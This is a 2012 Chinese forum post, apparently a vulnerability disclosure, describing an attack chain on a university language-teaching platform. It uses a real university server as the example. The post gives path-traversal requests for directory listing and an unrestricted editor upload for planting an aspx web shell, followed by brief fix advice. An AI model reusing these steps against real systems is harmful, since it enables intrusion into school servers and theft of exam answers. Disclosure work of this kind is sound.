找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2154|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
5 \+ C+ z5 P! ]: y1 n3 C2 U& {4 M4 J. n( R1 U1 Z
详细说明:+ ?, m5 A; U# z1 ~

% o& x4 ^+ h9 `- [5 Y' q$ O: l/ n以南开大学的为例: & m! K; q! W7 T
http://222.30.60.3/NPELS
- a% h' |& G* T: ?: |2 t9 hNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
* @( k7 [9 i0 G5 S<setting name="Update_CommonSvr_CommonService" serializeAs="String">
% [& Z5 R$ C+ `( M. J<value>http://222.30.60.3/NPELS/CommonService.asmx</value>% b2 M8 v8 t0 M
</setting>, R; C$ d9 j0 c2 O/ F: P+ B; ]
及版本号
: T: d  N" C" I4 @2 A<add key="TVersion" value="1, 0, 0, 2187">
2 p# @& ]- {1 h5 K! k</add>/ N, G# ?7 o4 a. Y' |# F- ]
直接访问3 A2 M$ B( d; R* W* L4 F
http://222.30.60.3/NPELS/CommonService.asmx2 H" q) d9 ?5 W( l& H9 j8 ~
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
4 z6 a2 n6 c7 Hhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187$ f5 I$ I8 p( f( {! W
进一步列目录(返回的网页很大,可以直接 wget 下来)$ v! j" o% D: @
http://222.30.60.3/NPELS/CommonS ... List?version=../../
9 V, D0 n* s( x$ e# v5 s# I8 ` 6 ^- s5 U) v* J2 V5 h
发现2 |1 A& ]' s7 v% P& z) |! ~9 u
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
7 b$ V5 p* D0 w5 B8 n  h可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
6 R) @) T% x8 _, |( P+ I; F9 k& e+ C上传后继续列目录找到木马地址直接访问即可1 }4 Y6 C- l7 |% q: [

0 l9 O$ B- z; J( fOOXX
; \4 W+ T4 H. [  S/ K# `   M4 O+ W" ^; {8 C. U& g& [! J
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法; k5 K1 x& I* y& r
漏洞证明:
9 g; U1 m9 E8 `6 z* B0 z' ^1 ]+ Y ! R2 M( p& {2 J4 G+ j& }
列目录:8 U0 N5 e& t8 e) F4 C/ \3 h+ @
http://222.30.60.3/NPELS/CommonS ... List?version=../../
3 }  b( A' w5 g2 Q7 x& C0 d& p文件上传:
) f3 ?; \0 s: o/ l! Y, ehttp://222.30.60.3/npelsv/editor/editor.htm+ e4 o" j* Y7 j; N
/ R& b: J5 P' ^  W
上传木马:
4 C2 U' t7 K. v. P* D; Ehttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx' x) [# j2 g5 i( y3 J( {
% E1 }3 w) @- _5 X7 k) J1 f
修复方案:# j6 d/ d& ]# L2 I2 D
好像考试系统必须使用 CommonService.asmx
( s0 j! b8 e1 Y) w% V9 l最好配置文件加密或者用别的方式不让它泄露出来, r: P- @" A- p
并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​) z  l% g3 `+ @! x- ^0 h4 g+ m# G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表